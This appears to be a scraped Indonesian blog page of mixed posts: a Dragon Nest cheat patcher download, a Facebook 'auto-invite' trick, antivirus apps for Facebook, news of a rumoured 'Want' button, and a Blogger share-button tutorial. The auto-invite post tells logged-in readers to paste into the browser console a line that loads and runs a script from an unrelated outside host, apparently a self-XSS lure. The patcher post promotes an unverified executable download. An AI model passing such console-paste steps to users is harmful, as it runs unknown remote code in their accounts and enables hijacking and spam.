Cheat Dragon Nest DN Patch Enabler 27 Agustus 2012

 langsung download dibawah ini :

hxxp://www.mediafire.com/download.php?wbwp00850nwk5gb

Cara pake:

1. [PENTING] Back Up SEMUA file dragon nest, baik itu folder game maupun file patch yang tambun (500mb+).
2. Letakkan file patch tambun dan file donlotan di dalam folder game.
3. Jalankan file donlotan, baca note yang muncul.
4. Kalo semua uda OK, klik install.

Jaminan keamanan:

1. Yang penting SEMUA file dragon nest udah di backup, ga ada yang perlu dikawatirkan.
2. Patcher TIDAK menyentuh file selain dibawah ini:
\Resource00.pak
\DNUpdater_18to20.exe
\DragonNest.exe
\Version.cfg
3. Berkas executable yang digunakan patcher hanya xdelta3.exe hxxp://code.google.com/p/xdelta/downloads/detail?name=xdelta3-3.0.4-x86-32.exe&can=2&q=

Limitasi:

1. Ga ada NPC baru, entah karena pake exe lama ato emang ntar donlot patch kecil waktu update resmi.
2. Quest2 baru = terputus dari server.
3. Resep item craft yang berbeda dengan patch saat ini (lv24) bisa bikin stuck.

N3


Auto-Invite Teman ke Grup di Facebook

 
 Auto Invite ini adalah javascript yang otomatis akan menambahkan teman ke Grup agan di facebook. Dengan sistem ini lebih memudahkan agan untuk membuat Rame Grupnya, dan yg pasti gk bakalan bikin keriting tangannya.

disini ane menggunakan browser Mozilla, dan ane sarankan agan juga pake Mozilla Firefox.
  • Pertama login ke Facebok
  • Masuk ke Group yang Anda buat !!
  • Tekan tombol CTRL + SHIFT + K pada keyboard Anda
  • Copy & paste code di bawah ini : 
document.body.appendChild(document.createElement('script')).src='http://medlayerz.16mb.com/undang.js';
  • Lalu tekan Enter, tunggu sampai selesai


5 Aplikasi untuk Memproteksi Akun Facebook

Aplikasi Facebook kini semakin canggih, dan juga crime / kriminalitas hacking semakin meningkat tajam, berjuta juta akun telah dibobol hacker tak bertanggung jawab. Oleh karena itu facebook kini bekerja sama dengan beberapa perusahaan antivirus ternama untuk memproteksi akun facebook pengguna. disamping ini ada sebagian aplikasi yang bagus untuk dipakai dan juga berguna untuk memproteksi akun facebook kita.

  • McAfee social Protection
baru-baru ini McAfee memberikan proteksi terhadap kiriman dari pengguna facebook, menganalisis phising, malware, dll
  • Norton Safe Web
Aplikasi Norton Safe Web untuk Facebook ini menyediakan fitur Auto-Scan yang fungsinya untuk otomatis memindai/men-scan URL yang berada di news feed tanpa harus membuka aplikasi Norton Safe Web, dan hasilnya akan di update sebagai status Anda

  • BitDefender SafeGo
Aplikasi ini juga tidak berbeda jauh dengan  Aplikasi diatas, namun tidak hanya pengguna Facebook, pengguna Twitterpun bisa ikut menikmati menggunakan aplikasi ini.

  • ESET Online Scanner
Aplikasi ini berguna untuk men-scanning komputer kita apabila komputer kita terkena malware karena ulah Keylogger, atau dari seranngan hacker

  • Protect.it
Aplikasi ini fungsinya untuk memproteksi akun kita dari link link pishing.



Facebook akan meluncurkan tombol baru "Wants"

Setelah IPO yang tidak berjalan begitu baik, para analis mengharapkan pengumuman posititf akan hadir dari Facebook berkaitan dengan produknya terutama tentang bagaimana Facebook bisa mendapatkan lebih banyak pemasukan dari jumlah penggunanya yang sangat besar.

Ketika Facebook meluncurkan tombol “Like”, dunia web menyambutnya dengan suka cita dan berbagai media pun memberitakannya. Tombol “Like” adalah kesuksesan besar bagi Facebook. Dan kini Facebook dirumorkan akan segera meluncurkan tombol “Want”. Pengembang web Tom Weddington menemukan kode di dalam web Facebook yang mengindikasikan sebuah tag untuk tombol “Want”, tidak lama kemudian Facebook menghilangkan kode tersebut dari SDK dan menonaktifkan tombol kode tersebut.

Diduga tombol “Want” ini akan digunakan oleh para pengguna untuk menandai hal yang mereka inginkan pada konten Facebook mereka, yang paling memungkinkan adalah menandai berbagai produk. Ini seperti daftar sesuatu yang ingin Anda miliki, sebuah daftar keinginan. Sebuah daftar yang mungkin bisa memberikan lebih banyak pemasukan bagi Facebook.

Informasi seperti ini sangat bernilai bagi perusahaan seperti Facebook. Dengan jenis data seperti ini, mereka bisa mengkoneksikan para pemilik merek dengan konsumen secara langsung. Dan hal seperti inilah seharusnya dilakukan Facebook. Menjadi sangat masuk akal, konsumen ingin mendapatkan apa yang mereka mau, pemilik merek terhubung secara langsung dengan selera konsumen untuk pembelian. Sebuah win-win solution.

Jika Google bisa mendapatkan data seperti ini dari permintaan pencarian, Facebook bisa mendapatkan pengguna mereka memberikannya pada Facebook. Satu hal yang bisa sangat baik dilakukan Facebook adalah membuat orang mau memberikan informasi berharga pada mereka. Dan ini adalah hal baik bagi Facebook untuk mendapatkan pemasukan atas layanan yang disediakan.

hxxpp://dailysocial.net/post/faceboo......gkatkan-aktivitas-social-commerce


Cara Membuat tombol Social Bookmark & Share di Blog dengan JQuery Nudging

Tombol Share, Social Bookmark ini bagi sebagian blogger diwajibkan, karena mampu mendapatkan backlink dari sebagian situs jejaring sosial. baclink itu diperoleh dari pengunjung yang menshare artikel kita ke berbagai jejaring sosial misalnya: Facebook, Twitter, etc.

Penerapan dari JQuery Nudging ini sebenarnya hanyalah effect bergoyang - goyang jika kita mensorot tombol-tombol dengan kursor. coba saja agan praktekan di bawah postingan blog ini. Bagi sebagian Blogger SEO, menerapkan Social Bookmark malah membuat Blognya menjadi berat untuk di Load, tapi tenang saja, Tombol Share JQuery Nudging ini lebih simpe,ringan,praktis untuk digunakan dan juga lebih SEO Friendly.

Bagi agan-agan yg mau pasang widget Tombol Social Bookmark & Share di Blog dengan JQuery Nudging, ikuti tutorial ini :

    Sebelum melangkah lebih jauh, ada baiknya agan Backup template dulu untuk berjaga-jaga bila ada error/ kesalahan pemasangan Tombol Share JQuery Nudging ini.  
  • Login di Blogger
  • Masuk ke Template > Edit Html
  • Centang pada Expand Widget Templates
  • Cari kode ]]>
  • Copy kode dibawah ini dan paste tepat dibawah kode  ]]>
  •  
    • Gunakan Ctrl+F agar pencarian lebih cepat, lalu cari kode ini pada template sobat. di atas kode tersebut akan ada kode seperti ini
    • Copy kode ini dibawah dan Paste-kan di atas Kode
    Share yoo..!
    
    
    
    
    Share to Facebook Share this post on twitter Bookmark Delicious Digg This Stumbleupon Reddit Yahoo Bookmark Furl-Diigo Google Bookmark Technorati Newsvine Tips Triks Blogger, Tutorial SEO, Info


    Related Posts Plugin for WordPress, Blogger...